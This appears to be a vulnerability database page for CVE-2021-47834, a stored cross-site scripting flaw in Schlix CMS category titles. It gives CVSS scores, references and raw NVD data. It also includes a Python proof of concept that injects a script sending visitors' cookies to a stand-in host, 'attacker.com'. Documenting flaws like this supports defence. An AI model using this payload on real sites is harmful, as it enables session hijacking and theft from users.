CVE-2021-47834

Description

Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Schlix CMS 2.2.6-6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47834 PoC - Schlix CMS Stored XSS in Category Titles
# Authentication required (low-privilege user account)

import requests
import json

target_url = "http://target-site.com/schlix"
username = "attacker_account"
password = "attacker_password"

session = requests.Session()

# Step 1: Login to obtain session cookie
login_url = f"{target_url}/admin/login"
login_data = {
    "username": username,
    "password": password
}
response = session.post(login_url, data=login_data)

# Step 2: Create malicious category with XSS payload
category_url = f"{target_url}/admin/categories/add"
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
category_data = {
    "title": xss_payload,
    "description": "Malicious category for XSS attack"
}
response = session.post(category_url, data=category_data)

# The XSS payload is now stored and will execute when any user views the category page
print("XSS payload injected successfully")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47834
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47834
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47834/
[4] VulDB https://vuldb.com/cve/CVE-2021-47834
[5] https://www.exploit-db.com/exploits/49837
[6] https://www.schlix.com/
[7] https://www.vulncheck.com/advisories/schlix-cms-title-persistent-cross-site-scripting-authenticated

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47834", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:08.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users."}, {"lang": "es", "value": "Schlix CMS 2.2.6-6 contiene una vulnerabilidad de cross-site scripting persistente que permite a usuarios autenticados inyectar scripts maliciosos en los títulos de las categorías. Los atacantes pueden crear una nueva categoría de contacto con una carga útil de script que se ejecutará cuando la página sea vista por otros usuarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49837", "source": "[email protected]"}, {"url": "https://www.schlix.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/schlix-cms-title-persistent-cross-site-scripting-authenticated", "source": "[email protected]"}]}}